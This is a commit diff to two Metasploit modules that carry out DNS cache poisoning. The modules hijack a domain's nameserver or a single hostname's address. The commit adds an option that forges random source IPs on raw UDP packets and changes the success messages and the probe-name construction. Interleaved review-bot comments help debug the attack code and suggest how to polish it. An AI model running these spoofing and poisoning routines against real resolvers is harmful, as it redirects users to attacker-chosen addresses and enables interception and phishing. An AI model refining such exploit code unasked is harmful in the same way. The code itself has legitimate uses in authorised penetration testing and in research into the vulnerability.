Adds an option to randomize the source address of the queries as well as some cosmetic changes. The tuning code should be forwarding queries properly now.

git-svn-id: file:///home/svn/framework3/trunk@5602 4d416f70-5f16-0410-b530-b9f4589650da
HD Moore 2008-07-26 04:35:28 +00:00
parent 9b56053974
commit b4fc255a41
2 changed files with 27 additions and 12 deletions


@ -43,6 +43,7 @@ class Auxiliary::Spoof::Dns::BailiWickedDomain < Msf::Auxiliary
register_options(
[
OptEnum.new('SRCADDR', [true, 'The source address to use for sending the queries', 'Real', ['Real', 'Random'], 'Real']),
OptPort.new('SRCPORT', [true, "The target server's source query port (0 for automatic)", nil]),
OptString.new('DOMAIN', [true, 'The domain to hijack', 'example.com']),
OptString.new('NEWDNS', [true, 'The hostname of the replacement DNS server', nil]),
@ -136,6 +137,7 @@ class Auxiliary::Spoof::Dns::BailiWickedDomain < Msf::Auxiliary
def run
target = rhost()
source = Rex::Socket.source_address(target)
saddr = datastore['SRCADDR']
sport = datastore['SRCPORT']
domain = datastore['DOMAIN'] + '.'
newdns = datastore['NEWDNS']
@ -279,10 +281,15 @@ class Auxiliary::Spoof::Dns::BailiWickedDomain < Msf::Auxiliary
req.rd = 1
src_ip = source
if(saddr == 'Random')
src_ip = Rex::Text.rand_text(4).unpack("C4").join(".")
end
buff = (
Scruby::IP.new(
#:src => barbs[0][:addr].to_s,
:src => source,
:src => src_ip,
:dst => target,
:proto => 17
)/Scruby::UDP.new(
@ -350,7 +357,7 @@ class Auxiliary::Spoof::Dns::BailiWickedDomain < Msf::Auxiliary
answer = Resolv::DNS::Message.decode(answer)
answer.each_answer do |name, ttl, data|
if((name.to_s + ".") == domain and data.name.to_s == newdns)
print_status("Poisoning successful after #{queries} attempts: #{domain} == #{newdns}")
print_status("Poisoning successful after #{queries} queries and #{responses} responses: #{domain} == #{newdns}")
srv_sock.close
disconnect_ip
return
@ -385,7 +392,7 @@ class Auxiliary::Spoof::Dns::BailiWickedDomain < Msf::Auxiliary
times = []
hostname = Rex::Text.rand_text_alphanumeric(16) + domain
hostname = Rex::Text.rand_text_alphanumeric(16) + '.' + domain
sock = Rex::Socket.create_udp(
'PeerHost' => server,
@ -413,7 +420,7 @@ class Auxiliary::Spoof::Dns::BailiWickedDomain < Msf::Auxiliary
times << [Time.now.to_f - q_beg_t, cnt]
cnt = 0
hostname = Rex::Text.rand_text_alphanumeric(16) + domain
hostname = Rex::Text.rand_text_alphanumeric(16) + '.' + domain
Thread.critical = false
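Review bot: The new success message in the `@ -350,7 +357,7` hunk interpolates `responses`, but nothing in this diff defines or increments that variable, and `run` begins outside the hunk; confirm it is maintained in the receive loop, otherwise the message raises NameError at exactly the moment the module would report success. The same message change appears in the BailiWickedHost section. In the `@ -279,10 +281,15` hunk the `if(saddr == 'Random')` block reads more naturally in modifier form, `src_ip = Rex::Text.rand_text(4).unpack("C4").join(".") if saddr == 'Random'`, and a short comment such as `# SRCADDR=Random: forge a random IPv4 source on each raw packet` would explain why `source` is no longer used directly. The trailing `'Real'` in the SRCADDR `OptEnum` attrs appears to repeat the default already given as the third element; if OptEnum ignores a fifth element it is dead text and can be dropped, so verify against the option class.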


@ -36,12 +36,14 @@ class Auxiliary::Spoof::Dns::BailiWickedHost < Msf::Auxiliary
register_options(
[
OptEnum.new('SRCADDR', [true, 'The source address to use for sending the queries', 'Real', ['Real', 'Random'], 'Real']),
OptPort.new('SRCPORT', [true, "The target server's source query port (0 for automatic)", nil]),
OptString.new('HOSTNAME', [true, 'Hostname to hijack', 'pwned.example.com']),
OptAddress.new('NEWADDR', [true, 'New address for hostname', '1.3.3.7']),
OptAddress.new('RECONS', [true, 'The nameserver used for reconnaissance', '208.67.222.222']),
OptInt.new('XIDS', [true, 'The number of XIDs to try for each query (0 for automatic)', 0]),
OptInt.new('TTL', [true, 'The TTL for the malicious host entry', 31337]),
], self.class)
end
@ -49,7 +51,7 @@ class Auxiliary::Spoof::Dns::BailiWickedHost < Msf::Auxiliary
def auxiliary_commands
return {
"check" => "Determine if the specified DNS server (RHOST) is vulnerable",
"racer" => "Determine the size of the window for the target server"
"racer" => "Determine the size of the window for the target server",
}
end
@ -129,6 +131,7 @@ class Auxiliary::Spoof::Dns::BailiWickedHost < Msf::Auxiliary
def run
target = rhost()
source = Rex::Socket.source_address(target)
saddr = datastore['SRCADDR']
sport = datastore['SRCPORT']
hostname = datastore['HOSTNAME'] + '.'
address = datastore['NEWADDR']
@ -271,10 +274,15 @@ class Auxiliary::Spoof::Dns::BailiWickedHost < Msf::Auxiliary
req.rd = 1
src_ip = source
if(saddr == 'Random')
src_ip = Rex::Text.rand_text(4).unpack("C4").join(".")
end
buff = (
Scruby::IP.new(
#:src => barbs[0][:addr].to_s,
:src => source,
:src => src_ip,
:dst => target,
:proto => 17
)/Scruby::UDP.new(
@ -342,7 +350,7 @@ class Auxiliary::Spoof::Dns::BailiWickedHost < Msf::Auxiliary
answer = Resolv::DNS::Message.decode(answer)
answer.each_answer do |name, ttl, data|
if((name.to_s + ".") == hostname and data.address.to_s == address)
print_status("Poisoning successful after #{queries} attempts: #{name} == #{address}")
print_status("Poisoning successful after #{queries} queries and #{responses} responses: #{name} == #{address}")
disconnect_ip
return
end
@ -374,7 +382,7 @@ class Auxiliary::Spoof::Dns::BailiWickedHost < Msf::Auxiliary
times = []
hostname = Rex::Text.rand_text_alphanumeric(16) + domain
hostname = Rex::Text.rand_text_alphanumeric(16) + '.' + domain
sock = Rex::Socket.create_udp(
'PeerHost' => server,
@ -402,7 +410,7 @@ class Auxiliary::Spoof::Dns::BailiWickedHost < Msf::Auxiliary
times << [Time.now.to_f - q_beg_t, cnt]
cnt = 0
hostname = Rex::Text.rand_text_alphanumeric(16) + domain
hostname = Rex::Text.rand_text_alphanumeric(16) + '.' + domain
Thread.critical = false
@ -454,6 +462,6 @@ class Auxiliary::Spoof::Dns::BailiWickedHost < Msf::Auxiliary
# XXX: We should subtract the timing from the target to us (calculated based on 0.50 of our non-recursive query times)
avg_count
end
end
end
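Review bot: The `@ -374,7 +382,7` and `@ -402,7 +410,7` hunks build the probe name as `Rex::Text.rand_text_alphanumeric(16) + '.' + domain`, yet this module registers HOSTNAME rather than DOMAIN and nothing in the diff shows where `domain` is bound; the enclosing racer method starts outside the hunk, so confirm the local is assigned there (presumably from the HOSTNAME option) or the new line fails with NameError the same way the old one would. If it is intentional, a comment such as `# domain is derived from HOSTNAME by the caller` at the first use would save the next reader the same search. The trailing comma added to the `auxiliary_commands` hash is valid Ruby and harmless.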